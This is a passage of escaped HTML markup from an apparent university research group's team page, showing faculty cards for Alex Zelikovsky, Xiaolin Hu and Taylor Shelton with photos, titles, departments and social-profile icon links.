d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c467-outer\">\n <div data-colibri-id=\"182-c467\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c467 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c468\" class=\"d-block style-973 style-local-182-c468 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c468-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c468-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c469\" class=\"h-global-transition-all h-heading style-974 style-local-182-c469 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c469\">\n <!---->\n <!---->\n <h4 class=\"\">Alex Zelikovsky</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c470\" class=\"h-text h-text-component style-975 style-local-182-c470 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Distinguished University Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c471\" class=\"h-text h-text-component style-976 style-local-182-c471 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c472\" class=\"style-977 style-local-182-c472 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c473-outer\">\n <div data-colibri-id=\"182-c473\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c473 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c474\" class=\"d-block style-973 style-local-182-c474 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c474-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c474-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c475\" class=\"h-global-transition-all h-heading style-974 style-local-182-c475 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c475\">\n <!---->\n <!---->\n <h4 class=\"\">Xiaolin Hu</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c476\" class=\"h-text h-text-component style-975 style-local-182-c476 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c477\" class=\"h-text h-text-component style-976 style-local-182-c477 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c478\" class=\"style-977 style-local-182-c478 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c479-outer\">\n <div data-colibri-id=\"182-c479\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c479 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c480\" class=\"d-block style-973 style-local-182-c480 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c480-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c480-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c481\" class=\"h-global-transition-all h-heading style-974 style-local-182-c481 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c481\">\n <!---->\n <!---->\n <h4 class=\"\">Taylor Shelton</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c482\" class=\"h-text h-text-component style-975 style-local-182-c482 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c483\" class=\"h-text h-text-component style-976 style-local-182-c483 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c484\" class=\"style-977 style-local-182-c484 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" 